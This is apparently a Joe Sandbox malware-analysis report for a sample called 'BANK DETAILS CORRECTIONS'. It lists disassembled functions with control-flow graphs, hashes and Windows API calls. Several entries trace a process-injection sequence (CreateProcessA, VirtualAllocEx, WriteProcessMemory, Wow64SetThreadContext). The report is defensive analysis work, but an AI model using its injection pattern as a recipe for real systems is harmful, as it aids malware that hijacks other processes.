                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1394 76d7e48-76d7edd 1396 76d7edf-76d7ee9 1394->1396 1397 76d7f16-76d7f36 1394->1397 1396->1397 1398 76d7eeb-76d7eed 1396->1398 1402 76d7f6f-76d7f9e 1397->1402 1403 76d7f38-76d7f42 1397->1403 1400 76d7eef-76d7ef9 1398->1400 1401 76d7f10-76d7f13 1398->1401 1404 76d7efd-76d7f0c 1400->1404 1405 76d7efb 1400->1405 1401->1397 1413 76d7fd7-76d8091 CreateProcessA 1402->1413 1414 76d7fa0-76d7faa 1402->1414 1403->1402 1406 76d7f44-76d7f46 1403->1406 1404->1404 1407 76d7f0e 1404->1407 1405->1404 1408 76d7f69-76d7f6c 1406->1408 1409 76d7f48-76d7f52 1406->1409 1407->1401 1408->1402 1411 76d7f54 1409->1411 1412 76d7f56-76d7f65 1409->1412 1411->1412 1412->1412 1415 76d7f67 1412->1415 1425 76d809a-76d8120 1413->1425 1426 76d8093-76d8099 1413->1426 1414->1413 1416 76d7fac-76d7fae 1414->1416 1415->1408 1418 76d7fd1-76d7fd4 1416->1418 1419 76d7fb0-76d7fba 1416->1419 1418->1413 1420 76d7fbc 1419->1420 1421 76d7fbe-76d7fcd 1419->1421 1420->1421 1421->1421 1422 76d7fcf 1421->1422 1422->1418 1436 76d8130-76d8134 1425->1436 1437 76d8122-76d8126 1425->1437 1426->1425 1439 76d8144-76d8148 1436->1439 1440 76d8136-76d813a 1436->1440 1437->1436 1438 76d8128 1437->1438 1438->1436 1442 76d8158-76d815c 1439->1442 1443 76d814a-76d814e 1439->1443 1440->1439 1441 76d813c 1440->1441 1441->1439 1444 76d816e-76d8175 1442->1444 1445 76d815e-76d8164 1442->1445 1443->1442 1446 76d8150 1443->1446 1447 76d818c 1444->1447 1448 76d8177-76d8186 1444->1448 1445->1444 1446->1442 1450 76d818d 1447->1450 1448->1447 1450->1450
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076D807E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 74eaaae0f3eaa9bb458293726f49ed4bcae68c11e417255a0fe868c13f5ef62c
                                                                                    • Instruction ID: 6fa7136ddee9945181070a41c25b50adf9a1ca320283fdc621256843b8108ff6
                                                                                    • Opcode Fuzzy Hash: 74eaaae0f3eaa9bb458293726f49ed4bcae68c11e417255a0fe868c13f5ef62c
                                                                                    • Instruction Fuzzy Hash: AD915EB1D1021ADFEF24CF69C841BEDBBB2BF48314F1485A9E819A7240D7749985CF92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135AE70 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1743 135ae70-135ae7f 1744 135ae81-135ae8e call 1359878 1743->1744 1745 135aeab-135aeaf 1743->1745 1750 135aea4 1744->1750 1751 135ae90 1744->1751 1746 135aeb1-135aebb 1745->1746 1747 135aec3-135af04 1745->1747 1746->1747 1754 135af06-135af0e 1747->1754 1755 135af11-135af1f 1747->1755 1750->1745 1799 135ae96 call 135b108 1751->1799 1800 135ae96 call 135b0f8 1751->1800 1754->1755 1757 135af21-135af26 1755->1757 1758 135af43-135af45 1755->1758 1756 135ae9c-135ae9e 1756->1750 1759 135afe0-135b0a0 1756->1759 1761 135af31 1757->1761 1762 135af28-135af2f call 135a854 1757->1762 1760 135af48-135af4f 1758->1760 1794 135b0a2-135b0a5 1759->1794 1795 135b0a8-135b0d3 GetModuleHandleW 1759->1795 1765 135af51-135af59 1760->1765 1766 135af5c-135af63 1760->1766 1764 135af33-135af41 1761->1764 1762->1764 1764->1760 1765->1766 1768 135af65-135af6d 1766->1768 1769 135af70-135af79 call 135a864 1766->1769 1768->1769 1774 135af86-135af8b 1769->1774 1775 135af7b-135af83 1769->1775 1776 135af8d-135af94 1774->1776 1777 135afa9-135afad 1774->1777 1775->1774 1776->1777 1779 135af96-135afa6 call 135a874 call 135a884 1776->1779 1782 135afb3-135afb6 1777->1782 1779->1777 1784 135afd9-135afdf 1782->1784 1785 135afb8-135afd6 1782->1785 1785->1784 1794->1795 1796 135b0d5-135b0db 1795->1796 1797 135b0dc-135b0f0 1795->1797 1796->1797 1799->1756 1800->1756
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0135B0C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 3caa14bea3e99040ac6c873fc0c7f3d0c1d239ac651c45edd498e713770ea6e7
                                                                                    • Instruction ID: 7ee0111d8ef0dc3e64a36a4b643cd62f7cae99ec30dacfc09ca919ea95d54704
                                                                                    • Opcode Fuzzy Hash: 3caa14bea3e99040ac6c873fc0c7f3d0c1d239ac651c45edd498e713770ea6e7
                                                                                    • Instruction Fuzzy Hash: 7A714870A00B058FEB64DF2AD444B5ABBF1BF88604F008A2DE84AD7B50D775E849CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 053B0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1801 53b0bfc-53b42fc 1804 53b43ac-53b43cc call 53b0ad4 1801->1804 1805 53b4302-53b4307 1801->1805 1812 53b43cf-53b43dc 1804->1812 1806 53b435a-53b4392 CallWindowProcW 1805->1806 1807 53b4309-53b4340 1805->1807 1809 53b439b-53b43aa 1806->1809 1810 53b4394-53b439a 1806->1810 1815 53b4349-53b4358 1807->1815 1816 53b4342-53b4348 1807->1816 1809->1812 1810->1809 1815->1812 1816->1815
                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 053B4381
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: e2706f4cd30e1c6962de442d81a1779cc922a9c010641b48b5e14927f1f01af0
                                                                                    • Instruction ID: dd00a02438a65b6dce1695cbf63d93a95c7e825ae729dc1ee2d6c92ccca4d556
                                                                                    • Opcode Fuzzy Hash: e2706f4cd30e1c6962de442d81a1779cc922a9c010641b48b5e14927f1f01af0
                                                                                    • Instruction Fuzzy Hash: F94139B4900305CFDB14CF95C489BAABBF6FB88314F28C559E519AB721D3B0A841CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1818 135449c-13559d9 CreateActCtxA 1821 13559e2-1355a3c 1818->1821 1822 13559db-13559e1 1818->1822 1829 1355a3e-1355a41 1821->1829 1830 1355a4b-1355a4f 1821->1830 1822->1821 1829->1830 1831 1355a51-1355a5d 1830->1831 1832 1355a60 1830->1832 1831->1832 1834 1355a61 1832->1834 1834->1834
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 002511664e926b3445a7fef075784b600e9db2caecc73e8ce8451f9d4c123bf9
                                                                                    • Instruction ID: 9c7ad576087d96a125083390b31ccdbd6b6515427c9ad023c49154eb954dbb4d
                                                                                    • Opcode Fuzzy Hash: 002511664e926b3445a7fef075784b600e9db2caecc73e8ce8451f9d4c123bf9
                                                                                    • Instruction Fuzzy Hash: 6E41EFB0C00718CFEB24CFAAC885BDDBBB5BF49704F20806AD408AB255DB756946CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1835 135590c-1355912 1836 1355918-13559d9 CreateActCtxA 1835->1836 1838 13559e2-1355a3c 1836->1838 1839 13559db-13559e1 1836->1839 1846 1355a3e-1355a41 1838->1846 1847 1355a4b-1355a4f 1838->1847 1839->1838 1846->1847 1848 1355a51-1355a5d 1847->1848 1849 1355a60 1847->1849 1848->1849 1851 1355a61 1849->1851 1851->1851
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 743bf96f54ad5f6d094e8649ab0abdedd17d8bfdc1365b6f787845cafe2d9957
                                                                                    • Instruction ID: 0d39a88249d95a9abed235f8d992a65cb35eb797afbd441036895a6633e85f4b
                                                                                    • Opcode Fuzzy Hash: 743bf96f54ad5f6d094e8649ab0abdedd17d8bfdc1365b6f787845cafe2d9957
                                                                                    • Instruction Fuzzy Hash: CB41F3B1C00719CFEB24CFA9C885BDEBBB5BF49704F20805AD408AB255DB756946CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135A898 Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1852 135a898-135a8a0 1854 135a8a2-135b328 1852->1854 1855 135a8cc 1852->1855 1859 135b330-135b35f LoadLibraryExW 1854->1859 1860 135b32a-135b32d 1854->1860 1857 135a92c-135a92f 1855->1857 1858 135a8ce-135a8db 1855->1858 1863 135a989-135a994 1857->1863 1861 135a93c-135a93f 1858->1861 1862 135a8de-135a900 1858->1862 1864 135b361-135b367 1859->1864 1865 135b368-135b385 1859->1865 1860->1859 1861->1863 1862->1857 1864->1865
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0135B141,00000800,00000000,00000000), ref: 0135B352
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 05fec1aca4127609c4984f461e2c0a3ccb5a7bb5551b935485ccdc1ab53c88bf
                                                                                    • Instruction ID: 57340d7dd27319f34b9160d149295e020b81dc8dc0e43094e7a61fea824718d6
                                                                                    • Opcode Fuzzy Hash: 05fec1aca4127609c4984f461e2c0a3ccb5a7bb5551b935485ccdc1ab53c88bf
                                                                                    • Instruction Fuzzy Hash: FA31EFBA804359CFEB11CFAAC444AEABFF4EB59614F05815AD854AB602C3349545CFA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D7BB9 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1869 76d7bb9-76d7c0e 1872 76d7c1e-76d7c5d WriteProcessMemory 1869->1872 1873 76d7c10-76d7c1c 1869->1873 1875 76d7c5f-76d7c65 1872->1875 1876 76d7c66-76d7c96 1872->1876 1873->1872 1875->1876
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076D7C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 6a31158599f688799c1084f3271b44c2d184e8e33c13228e7c7bbf57ea5624dc
                                                                                    • Instruction ID: 91a9e773e76c5f9c98744ae598bb8e0d3df5911361d5cb6125fe49a0ba8d70a3
                                                                                    • Opcode Fuzzy Hash: 6a31158599f688799c1084f3271b44c2d184e8e33c13228e7c7bbf57ea5624dc
                                                                                    • Instruction Fuzzy Hash: 68214BB5D003499FDB10CFA9C881BDEBBF4FF48320F108429E919A7240C7789941CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D7BC0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1880 76d7bc0-76d7c0e 1882 76d7c1e-76d7c5d WriteProcessMemory 1880->1882 1883 76d7c10-76d7c1c 1880->1883 1885 76d7c5f-76d7c65 1882->1885 1886 76d7c66-76d7c96 1882->1886 1883->1882 1885->1886
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076D7C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 8f029deeaf9a7a3460ae89b64d2b926a7c8a5f0193c84c4a7c5cafa7a97ab9b0
                                                                                    • Instruction ID: 14827164a8e5bf78658702a7c96d86cf575e112f3c493a2d496f07e977b032b0
                                                                                    • Opcode Fuzzy Hash: 8f029deeaf9a7a3460ae89b64d2b926a7c8a5f0193c84c4a7c5cafa7a97ab9b0
                                                                                    • Instruction Fuzzy Hash: 982128B1D003499FDB10CFAAC885BDEBBF5FF48310F108429E919A7240C7799944CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D7CA9 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1890 76d7ca9-76d7d3d ReadProcessMemory 1894 76d7d3f-76d7d45 1890->1894 1895 76d7d46-76d7d76 1890->1895 1894->1895
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076D7D30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: f401dee1d003f315cf9bd820365c9f0b1cd798e2fa36659022717901699c79ed
                                                                                    • Instruction ID: 99a7223d5e84ab9c0dc669012fcc5552654a5f0df701e9cbe818385b98e92cb8
                                                                                    • Opcode Fuzzy Hash: f401dee1d003f315cf9bd820365c9f0b1cd798e2fa36659022717901699c79ed
                                                                                    • Instruction Fuzzy Hash: 2E2126B1C003499FDB10CFAAC881BEEBBB5FF48310F10842AE919A7240C77899459BA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135C9E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1899 135c9e0-135d3d4 DuplicateHandle 1901 135d3d6-135d3dc 1899->1901 1902 135d3dd-135d3fa 1899->1902 1901->1902
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0135D306,?,?,?,?,?), ref: 0135D3C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 85c2c7e2cb19084ae2b1970fa153a07d9a15d181be697dc14638b25be9414b80
                                                                                    • Instruction ID: 6df319ada4b441d0c788e0b02656d2ebc0dae61e01c6c5b44118892eba30de74
                                                                                    • Opcode Fuzzy Hash: 85c2c7e2cb19084ae2b1970fa153a07d9a15d181be697dc14638b25be9414b80
                                                                                    • Instruction Fuzzy Hash: C721D2B5900348DFDB10CF9AD484ADEBBF8EB48714F14841AE918A7351D374A954CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D75EB Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1905 76d75eb-76d763b 1907 76d763d-76d7649 1905->1907 1908 76d764b-76d767b Wow64SetThreadContext 1905->1908 1907->1908 1910 76d767d-76d7683 1908->1910 1911 76d7684-76d76b4 1908->1911 1910->1911
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076D766E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 947427710dc2666dc1b8f3d5ce06fdcf42777e1789ed89d32eb00e1d50faf10e
                                                                                    • Instruction ID: 4db15b66146854ab8867c7307a6399f068d89bd1d3e2b4ab90c2b4cf109c7832
                                                                                    • Opcode Fuzzy Hash: 947427710dc2666dc1b8f3d5ce06fdcf42777e1789ed89d32eb00e1d50faf10e
                                                                                    • Instruction Fuzzy Hash: 592104B1D103498FDB20CFAAC4857EEBBF4EF48314F14842AD419A7640D7789945CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D75F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076D766E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: f7e642623d72fc3203e0a87ec19cc38df745c28b860b54bffe100e07dc1413d5
                                                                                    • Instruction ID: f53e8d053ad7a0368afb66f8e29ae70d465277bd8d80dfe3ee2ce959d58cca33
                                                                                    • Opcode Fuzzy Hash: f7e642623d72fc3203e0a87ec19cc38df745c28b860b54bffe100e07dc1413d5
                                                                                    • Instruction Fuzzy Hash: 102115B1D003498FDB20DFAAC4857EEBBF4EF48324F14842AD419A7240D778A945CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D7CB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076D7D30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: 9fead55d0c4f8dd2634bf58a02b5821007426cc7cc8a865303e7e1390acc3031
                                                                                    • Instruction ID: d17f2f2c15a1c722fd8a1a70fd73b63ac99da6940030300d2a36e4bdb14a0f50
                                                                                    • Opcode Fuzzy Hash: 9fead55d0c4f8dd2634bf58a02b5821007426cc7cc8a865303e7e1390acc3031
                                                                                    • Instruction Fuzzy Hash: FB2116B1D003499FDB10CFAAC881BEEBBF5FF48310F10842AE919A7240C7799941CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135D338 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1915 135d338-135d3d4 DuplicateHandle 1916 135d3d6-135d3dc 1915->1916 1917 135d3dd-135d3fa 1915->1917 1916->1917
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0135D306,?,?,?,?,?), ref: 0135D3C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: a9fd5cddaa99828bd45a031489d3fba1cd4a0daa237081f9856543ee72b99f72
                                                                                    • Instruction ID: dcca19942f0d88fe1ee96f1d394b3d677d24f1bd0c65e487248deb630f660b86
                                                                                    • Opcode Fuzzy Hash: a9fd5cddaa99828bd45a031489d3fba1cd4a0daa237081f9856543ee72b99f72
                                                                                    • Instruction Fuzzy Hash: 3C21E2B5D00208DFDB10CFAAE584ADEBBF5EB48314F14841AE918B3750D374A954CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D7AF8 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076D7B6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 6813ebd1b4259243c0be24ebb7767f6f05870ec024ca783e4b4b59db51a8ef9c
                                                                                    • Instruction ID: 5af3025b236c379b2e61c1ca90aba0ac4b5aaa8a2db31eaccfe2c8454e571a34
                                                                                    • Opcode Fuzzy Hash: 6813ebd1b4259243c0be24ebb7767f6f05870ec024ca783e4b4b59db51a8ef9c
                                                                                    • Instruction Fuzzy Hash: 1A1167B2C003099FDB20DFAAC845BDEBBF5EF48320F10881AE815A7650C7759941CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135A8B0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0135B141,00000800,00000000,00000000), ref: 0135B352
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 3dd9120321296cdc0270e5400e9945b23c77ebfa7427770e15735ac43814ef62
                                                                                    • Instruction ID: 3a83f8c5528c22f020454a97762867de168d83317367c042b2a808826abe2a39
                                                                                    • Opcode Fuzzy Hash: 3dd9120321296cdc0270e5400e9945b23c77ebfa7427770e15735ac43814ef62
                                                                                    • Instruction Fuzzy Hash: B91114B6D003488FDB14CF9AC444BAEFBF5EB48714F14842AE919B7600C375A545CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135B2E0 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0135B141,00000800,00000000,00000000), ref: 0135B352
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 7ad294d080b9d2884a4421e068c145cccd210f02f8562873c7205f9249113160
                                                                                    • Instruction ID: 2032005dbcc5266fde71f5d8c77397e26511066e7fad16bfe2a0f4c8d256b5db
                                                                                    • Opcode Fuzzy Hash: 7ad294d080b9d2884a4421e068c145cccd210f02f8562873c7205f9249113160
                                                                                    • Instruction Fuzzy Hash: F91142B6C003488FDB10CFAAC444BDEFBF4AB48310F14842AE929A7200C375A545CFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D7B00 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076D7B6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 9686e8b67a5b25aa17a9562836aa3fd523de432fef6bf75d3146d87683385f8d
                                                                                    • Instruction ID: 226184a7d04d81ad980c69f161440afc01c339bf2ffc08d3e8049a53ed6e1ddd
                                                                                    • Opcode Fuzzy Hash: 9686e8b67a5b25aa17a9562836aa3fd523de432fef6bf75d3146d87683385f8d
                                                                                    • Instruction Fuzzy Hash: AD1126B1D003499FDB20DFAAC845BDEBBF5EF48320F14881AE515A7250C779A940CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D753B Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
